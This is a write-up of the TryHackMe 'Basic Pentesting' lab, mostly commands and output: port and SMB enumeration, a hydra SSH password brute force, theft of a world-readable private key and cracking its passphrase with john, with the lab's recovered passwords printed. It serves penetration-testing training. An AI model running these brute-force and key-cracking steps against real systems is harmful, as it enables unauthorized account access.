Type: Challenge
Difficulty: Easy
Tags: Linux
Meta Tags: Walkthrough, Walk-through, Write-up, Writeup
Subscription type: Free
Description:
This is a machine that allows you to practise web app hacking and privilege escalation
Room link: https://tryhackme.com/r/room/basicpentestingjt
We start by scanning the machine with nmap
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ nmap -v -sV -sC -p- 10.10.87.99
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-24 15:15 CEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating Ping Scan at 15:15
Scanning 10.10.87.99 [2 ports]
Completed Ping Scan at 15:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:15
Completed Parallel DNS resolution of 1 host. at 15:15, 0.00s elapsed
Initiating Connect Scan at 15:15
Scanning 10.10.87.99 [65535 ports]
Discovered open port 80/tcp on 10.10.87.99
Discovered open port 445/tcp on 10.10.87.99
Discovered open port 139/tcp on 10.10.87.99
Discovered open port 22/tcp on 10.10.87.99
Discovered open port 8080/tcp on 10.10.87.99
Discovered open port 8009/tcp on 10.10.87.99
Completed Connect Scan at 15:15, 13.63s elapsed (65535 total ports)
Initiating Service scan at 15:15
Scanning 6 services on 10.10.87.99
Completed Service scan at 15:15, 11.15s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.87.99.
Initiating NSE at 15:15
Completed NSE at 15:15, 2.03s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.19s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Nmap scan report for 10.10.87.99
Host is up (0.047s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-06-24T13:15:50
|_ start_date: N/A
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-06-24T09:15:51-04:00
NSE: Script Post-scanning.
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.65 secondsWe have six services running:
- OpenSSH v7.2p2 on port 22
- Apache httpd v2.4.18 on port 80
- Samba smbd v3.X - 4.X on port 139
- Samba smbd v4.3.11 on port 445
- Apache Jserv (Protocol v1.3) on port 8009
- Apache Tomcat v 9.0.7 on port 8080
Manually browsing to:
- Port 80 shows a
Undergoing maintenancepage.
On the HTML-page is this comment<!-- Check our dev note section if you need to know what to work on. --> - Port 8080 shows a default
Apache Tomcat/9.0.7page
Next, let's try to identify common directories with gobuster
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.87.99
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.87.99
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 316] [--> http://10.10.87.99/development/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================The /development is likely the dev note section mentioned in the HTML-comment.
Browsing to http://10.10.87.99/development/ gives us a directory listing with two files:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
We continue our enumeration with Samba/SMB using two tools.
First, nmap
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ nmap -v -p 139,445 --script smb-enum* 10.10.87.99
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-24 15:43 CEST
NSE: Loaded 7 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating Ping Scan at 15:43
Scanning 10.10.87.99 [2 ports]
Completed Ping Scan at 15:43, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.00s elapsed
Initiating Connect Scan at 15:43
Scanning 10.10.87.99 [2 ports]
Discovered open port 445/tcp on 10.10.87.99
Discovered open port 139/tcp on 10.10.87.99
Completed Connect Scan at 15:43, 0.04s elapsed (2 total ports)
NSE: Script scanning 10.10.87.99.
Initiating NSE at 15:43
NSE Timing: About 75.00% done; ETC: 15:45 (0:00:30 remaining)
NSE Timing: About 75.00% done; ETC: 15:45 (0:00:40 remaining)
NSE Timing: About 75.00% done; ETC: 15:46 (0:00:54 remaining)
NSE Timing: About 75.00% done; ETC: 15:47 (0:01:10 remaining)
NSE Timing: About 75.00% done; ETC: 15:49 (0:01:26 remaining)
Completed NSE at 15:48, 300.29s elapsed
Nmap scan report for 10.10.87.99
Host is up (0.051s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-sessions:
|_ <nobody>
| smb-enum-shares:
| account_used: guest
| \\10.10.87.99\Anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba\anonymous
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.87.99\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
| Users: 3
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE
| smb-enum-domains:
| BASIC2
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_ Account lockout disabled
NSE: Script Post-scanning.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 300.72 secondsNot so much useful information there.
Second, enum4linux
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ enum4linux -a 10.10.87.99 | tee enum4linux.txt
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 24 15:56:23 2024
=========================================( Target Information )=========================================
Target ........... 10.10.87.99
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.87.99 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.87.99 )================================
Looking up status of 10.10.87.99
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 10.10.87.99 )====================================
<---snip--->
===================( Users on 10.10.87.99 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
================================( Getting printer info for 10.10.87.99 )================================
No printers returned.
enum4linux complete on Mon Jun 24 16:00:07 2024We have two users identified: kay and jan. The jan user is likely the user with the weak password mentioned before.
We can try to brute-force the password for user jan with hydra
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ hydra -P /usr/share/wordlists/rockyou.txt -l jan -s 22 ssh://10.10.87.99
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-24 16:14:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.87.99:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 123.67 tries/min, 371 tries in 00:03h, 14344029 to do in 1933:10h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343634 to do in 2184:38h, 15 active
[22][ssh] host: 10.10.87.99 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-24 16:21:29Success, the password is armando
Now we can login via SSH as jan and look for interesting files
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh jan@10.10.87.99
The authenticity of host '10.10.87.99 (10.10.87.99)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.99' (ED25519) to the list of known hosts.
jan@10.10.87.99's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshstNo interesting files for this user.
Let's check for other users.
jan@basic2:~$ cd ..
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 19 2018 .
drwxr-xr-x 24 root root 4096 Apr 23 2018 ..
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$ We have a world readable private key (id_rsa)
We copy the file to our local machine, get the hash and try to crack it
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ scp jan@10.10.87.99:/home/kay/.ssh/id_rsa id_rsa_kay
jan@10.10.87.99's password:
id_rsa 100% 3326 35.7KB/s 00:00
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh2john id_rsa_kay > kay_hash.txt
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa_kay)
1g 0:00:00:00 DONE (2024-06-24 16:33) 4.347g/s 359791p/s 359791c/s 359791C/s bird..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed. The password is beeswax.
Next, we login via SSH with the private key
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh -i id_rsa_kay kay@10.10.87.99
Enter passphrase for key 'id_rsa_kay':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ Finally, we search for the final password.
kay@basic2:~$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
kay@basic2:~$ cat pass.bak
h<REDACTED>$
kay@basic2:~$ For additional information, please see the references below.